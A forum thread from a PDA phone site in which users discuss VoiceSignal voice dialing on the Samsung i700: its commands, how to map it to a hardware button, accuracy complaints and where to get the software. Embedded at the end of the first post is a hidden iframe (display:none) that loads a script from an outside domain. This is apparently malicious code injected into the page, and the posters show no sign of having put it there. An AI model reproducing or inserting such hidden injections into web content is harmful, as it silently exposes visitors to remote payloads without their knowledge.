+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

Does the i700 support voice activated calling?

Yes, the i700 comes with software to support voice dialing, and it works very well. It is called VoiceSignal, and must be installed from the companion CD.

The best way to use it is to tie it to a hardware button (like the voice memo button that is rarely used). When you press the button, VoiceSignal launches and says "Please Say a Command". This is very quick. Here are the command choices that you can choose from...

Digit Dial - With this command, you will be prompted to say the telephone number digit by digit. It appears that you must enter the area code as well.
    Name Dial - With this command, you can choose any name or company that is in your Contacts database, and it will dial the number. If the contact has more than one number, it gives you a list and you pick the correct number from the list. I find this very accurate, considering no learning was done. It will even figure out that when you say "Steve", that the "Stephen" in the database is the right guy.
    Quick Dial - With Quick Dial, you can pick from a special list of names that you have trained with nicknames. This is handy for frequently called names. I have not found a need to use it since the Name Dial is so accurate.
    Name Lookup - This works the same as Name Dial, but instead of dialing, it shows a one page summary of the contact's name, address, numbers, etc..
    Open <App> - This selection will let you launch an application. You can either say Open, then pick from a list, or you can say Open Calculator (to have it open the Calculator program). You must preconfigure the apps that you want to be opened from VoiceSignal.

This program is very quick and very accurate. I've only used it for a short time... and will update this FAQ if I find it less accurate in other settings.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

Voice Dial

Can you guys do some trials and post how well the voice recognition software works? Also how big is the program?

How do you tie voice activation to the recorder button?

Hi -- You mentioned in a couple posts that you have tied the voice activation software to the exterior record button...can you post how you did that?

Thanks.

Set Record Button to Activate Voice Signal's VR

Go to START -&gt; SETTINGS -&gt; BUTTONS. You'll see a pull down menu that allows you to map any application to the various buttons on the i700.

I must report that I am not very happy with the voice recognition. It has great difficulty with anything beyond the most ordianry names. My last name is Broughton which is pronounced like brought n not bro ton, but unless I mispronounce my name it fails every time. I have a business partner whose name is Gunnar Bjorklund. No matter how I try to say it, it will not acknowledge that it exists.
    I set him up on "quick dial", but it doesn't allow me to choose which number to call. Not sure what logic it uses to decide which of 4 numbers it dials.
    Otherwise I have been pretty happy with the phone, but this is a big dissapointment!

Voice Signal is a separate product and company, and it's quite likely based on their quick effort to release a patched version for us that they'll be around for a long time giving us upgrades.
    -s

Just migrated from I700 to I830 dki700's Avatar
    Voice Signal's web site has an upgrade posted:

http://www.voicesignal.com/support/i700V/index.html
    DK-I700

Voice Signal

I never received a companion CD in the box with my Samsung I700. How do i get this since appearently i need it to run voice signal so i can initiate voice activated dialing?

delid2@comcast.net

Just migrated from I700 to I830 dki700's Avatar

Voice Signal

I didn't get the companion CD either. You can download the full version or the upgrade from their web site:

http://www.voicesignal.com/
    DK-I700

All I have to say is thanks to Pdaphonehome.com - withouth them, I would not get to know most of these cool features on my phone (even turning on spearkerphone).

The newest version of Voicesignal works excellent - I'm still waiting for a mistake.

Michael

Voice Signal

I have voice signal too but i got it last year. How do I know if i have the latest version and furthermore, that's the difference between the two? And even further more, what are some reason why i should get the newest version? What does the latest version have that the old one doesn't?

delid2@comcast.net

Angry Voice Activating Calling Problem

I cant seem to find the program for voice activated calling in my companion CD. Can someone give me some more information as to how to make this work? Thanks.
    We are what we repeatedly do. Excellence is not an act but a habit.

Aristotle